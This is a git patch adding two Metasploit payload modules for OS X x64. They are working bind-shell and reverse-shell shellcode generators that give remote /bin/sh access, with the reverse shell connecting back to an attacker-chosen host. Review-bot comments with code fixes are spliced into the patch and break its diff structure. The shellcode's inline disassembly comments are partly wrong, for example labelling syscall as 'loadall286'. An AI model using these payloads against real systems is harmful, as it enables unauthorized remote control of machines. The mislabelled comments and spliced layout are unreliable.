From f5df7e0e8af375d1f2968840e0487ed193e05fb7 Mon Sep 17 00:00:00 2001
From: dcbz
Date: Wed, 19 Sep 2012 16:59:26 -0500
Subject: [PATCH] Added 2 payload modules (reverse and bind tcp shells)

---
 .../singles/osx/x64/shell_bind_tcp.rb | 94 +++++++++++++++++++
 .../singles/osx/x64/shell_reverse_tcp.rb | 88 +++++++++++++++++
 2 files changed, 182 insertions(+)
 create mode 100644 modules/payloads/singles/osx/x64/shell_bind_tcp.rb
 create mode 100644 modules/payloads/singles/osx/x64/shell_reverse_tcp.rb

diff --git a/modules/payloads/singles/osx/x64/shell_bind_tcp.rb b/modules/payloads/singles/osx/x64/shell_bind_tcp.rb
new file mode 100644
index 0000000000..5c51b902b6
--- /dev/null
+++ b/modules/payloads/singles/osx/x64/shell_bind_tcp.rb
@@ -0,0 +1,94 @@
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+# http://metasploit.com/
+##
+
+
+require 'msf/core'
+
+module Metasploit3
+
+ include Msf::Payload::Single
+ include Msf::Payload::Osx
+ include Msf::Sessions::CommandShellOptions
+
+ def initialize(info = {})
+ super(merge_info(info,
+ 'Name' => 'OS X x64 Shell Bind TCP',
+ 'Version' => '$Revision$',
+ 'Description' => 'Bind an arbitrary command to an arbitrary port',
+ 'Author' => 'nemo ',
+ 'License' => MSF_LICENSE,
+ 'Platform' => 'osx',
+ 'Arch' => ARCH_X86_64,
+ 'Handler' => Msf::Handler::BindTcp,
+ 'Session' => Msf::Sessions::CommandShellUnix
+ ))
+
+ # exec payload options
+ register_options(
+ [
+ OptString.new('CMD', [ true, "The command string to execute", "/bin/sh" ]),
+ OptString.new('LPORT',[ true, "The port to bind to", "5555" ]),
+ ], self.class)
+ end
+
+ # build the shellcode payload dynamically based on the user-provided CMD
+ def generate
+ cmd = (datastore['CMD'] || '') << "\x00"
+ port = [datastore['LPORT'].to_i].pack('n')
+ call = "\xe8" + [cmd.length].pack('V')
+ payload =
+ "\xB8\x61\x00\x00\x02" + # mov eax,0x2000061
+ "\x6A\x02" + # push byte 0x1
+ "\x5f" + # pop rdi
+ "\x6A\x01" + # push byte 0x1
+ "\x5e" + # pop rsi
+ "\x48\x31\xD2" + # xor rdx,rdx
+ "\x0F\x05" + # loadall286
+ "\x48\x89\xC7" + # mov rdi,rax
+ "\xB8\x68\x00\x00\x02" + # mov eax,0x2000068
+ "\x48\x31\xF6" + # xor rsi,rsi
+ "\x56" + # push rsi
+ "\xBE\x00\x02" + port + # mov esi,0xb3150200
+ "\x56" + # push rsi
+ "\x48\x89\xE6" + # mov rsi,rsp
+ "\x6A\x10" + # push 0x10
+ "\x5A" + # pop rdx
+ "\x0F\x05" + # loadall286
+ "\xB8\x6A\x00\x00\x02" + # mov eax,0x200006a
+ "\x48\x31\xF6" + # xor rsi,rsi
+ "\x48\xFF\xC6" + # inc rsi
+ "\x49\x89\xFC" + # mov r12,rdi
+ "\x0F\x05" + # loadall286
+ "\xB8\x1E\x00\x00\x02" + # mov eax,0x200001e
+ "\x4C\x89\xE7" + # mov rdi,r12
+ "\x48\x89\xE6" + # mov rsi,rsp
+ "\x48\x89\xE2" + # mov rdx,rsp
+ "\x48\x83\xEA\x04" + # sub rdx,byte +0x4
+ "\x0F\x05" + # loadall286
+ "\x48\x89\xC7" + # mov rdi,rax
+ "\xB8\x5A\x00\x00\x02" + # mov eax,0x200005a
+ "\x48\x31\xF6" + # xor rsi,rsi
+ "\x0F\x05" + # loadall286
+ "\xB8\x5A\x00\x00\x02" + # mov eax,0x200005a
+ "\x48\xFF\xC6" + # inc rsi
+ "\x0F\x05" + # loadall286
+ "\x48\x31\xC0" + # xor rax,rax
+ "\xB8\x3B\x00\x00\x02" + # mov eax,0x200003b
+ call + # call CMD.len
+ cmd + # CMD
+ "\x48\x8b\x3c\x24" + # mov rdi, [rsp]
+ "\x48\x31\xD2" + # xor rdx,rdx
+ "\x52" + # push rdx
+ "\x57" + # push rdi
+ "\x48\x89\xE6" + # mov rsi,rsp
+ "\x0F\x05" # loadall286
+ end
+end
diff --git a/modules/payloads/singles/osx/x64/shell_reverse_tcp.rb b/modules/payloads/singles/osx/x64/shell_reverse_tcp.rb
new file mode 100644
index 0000000000..2baaa85529
--- /dev/null
+++ b/modules/payloads/singles/osx/x64/shell_reverse_tcp.rb
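Review bot: In `generate`, `cmd = (datastore['CMD'] || '') << "\x00"` appends in place to what appears to be the datastore's own String object, so each call to `generate` grows the stored CMD by another NUL and the `call` displacement and emitted bytes differ between calls; a non-mutating concatenation, `cmd = (datastore['CMD'] || '') + "\x00"`, avoids that. The displacement on the next line should also be `call = "\xe8" + [cmd.bytesize].pack('V')`, because `String#length` counts characters and a CMD containing multibyte characters would make the call target land inside the string rather than after it. The same two lines appear in the `generate` of shell_reverse_tcp.rb. The inline disassembly comments are off in places and worth correcting for the next reader: `\x0F\x05` is `syscall` in 64-bit mode, not `loadall286`, and `\x6A\x02` encodes `push byte 0x2`, not `0x1`.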
@@ -0,0 +1,88 @@
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+# http://metasploit.com/
+##
+
+
+require 'msf/core'
+
+module Metasploit3
+
+ include Msf::Payload::Single
+ include Msf::Payload::Osx
+ include Msf::Sessions::CommandShellOptions
+
+ def initialize(info = {})
+ super(merge_info(info,
+ 'Name' => 'OS X x64 Shell Reverse TCP',
+ 'Version' => '$Revision$',
+ 'Description' => 'Connect back to attacker and spawn a command shell',
+ 'Author' => 'nemo ',
+ 'License' => MSF_LICENSE,
+ 'Platform' => 'osx',
+ 'Arch' => ARCH_X86_64,
+ 'Handler' => Msf::Handler::ReverseTcp,
+ 'Session' => Msf::Sessions::CommandShellUnix
+ ))
+
+ # exec payload options
+ register_options(
+ [
+ OptString.new('CMD', [ true, "The command string to execute", "/bin/sh" ]),
+ OptString.new('LPORT',[ true, "The port to connect to", "5555" ]),
+ OptString.new('LHOST',[ true, "The host to connect to", "127.0.0.1" ])
+ ], self.class)
+ end
+
+ # build the shellcode payload dynamically based on the user-provided CMD
+ def generate
+ cmd = (datastore['CMD'] || '') << "\x00"
+ port = [datastore['LPORT'].to_i].pack('n')
+ ipaddr = [datastore['LHOST'].split('.').inject(0) {|t,v| (t << 8 ) + v.to_i}].pack("N")
+
+ call = "\xe8" + [cmd.length].pack('V')
+ payload =
+ "\xB8\x61\x00\x00\x02" + # mov eax,0x2000061
+ "\x6A\x02" + # push byte +0x2
+ "\x5F" + # pop rdi
+ "\x6A\x01" + # push byte +0x1
+ "\x5E" + # pop rsi
+ "\x48\x31\xD2" + # xor rdx,rdx
+ "\x0F\x05" + # loadall286
+ "\x49\x89\xC4" + # mov r12,rax
+ "\x48\x89\xC7" + # mov rdi,rax
+ "\xB8\x62\x00\x00\x02" + # mov eax,0x2000062
+ "\x48\x31\xF6" + # xor rsi,rsi
+ "\x56" + # push rsi
+ "\x48\xBE\x00\x02" + port + # mov rsi,0x100007fb3150200
+ ipaddr +
+ "\x56" + # push rsi
+ "\x48\x89\xE6" + # mov rsi,rsp
+ "\x6A\x10" + # push byte +0x10
+ "\x5A" + # pop rdx
+ "\x0F\x05" + # loadall286
+ "\x4C\x89\xE7" + # mov rdi,r12
+ "\xB8\x5A\x00\x00\x02" + # mov eax,0x200005a
+ "\x48\x31\xF6" + # xor rsi,rsi
+ "\x0F\x05" + # loadall286
+ "\xB8\x5A\x00\x00\x02" + # mov eax,0x200005a
+ "\x48\xFF\xC6" + # inc rsi
+ "\x0F\x05" + # loadall286
+ "\x48\x31\xC0" + # xor rax,rax
+ "\xB8\x3B\x00\x00\x02" + # mov eax,0x200003b
+ call + # call CMD.len
+ cmd + # CMD
+ "\x48\x8B\x3C\x24" + # mov rdi,[rsp]
+ "\x48\x31\xD2" + # xor rdx,rdx
+ "\x52" + # push rdx
+ "\x57" + # push rdi
+ "\x48\x89\xE6" + # mov rsi,rsp
+ "\x0F\x05" # loadall286
+ end
+end
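Review bot: The hand-rolled LHOST parsing in `generate`, `ipaddr = [datastore['LHOST'].split('.').inject(0) {|t,v| (t << 8 ) + v.to_i}].pack("N")`, silently turns a hostname or malformed address into a wrong sockaddr (every non-numeric octet becomes 0 via `to_i`) instead of failing; `ipaddr = Rex::Socket.addr_aton(datastore['LHOST'])` produces the same network-order packed form and rejects input it cannot resolve. Likewise `port = [datastore['LPORT'].to_i].pack('n')` accepts non-numeric and out-of-range values without complaint. Re-registering LHOST and LPORT as `OptString` in `initialize` appears to shadow the typed address/port options the `Msf::Handler::ReverseTcp` mixin already registers, which is what would have validated them before `generate` runs; the `OptString` LPORT in shell_bind_tcp.rb has the same effect against `Msf::Handler::BindTcp`. Dropping the redundant `OptString.new('LPORT', ...)` and `OptString.new('LHOST', ...)` entries and keeping only CMD would restore that validation.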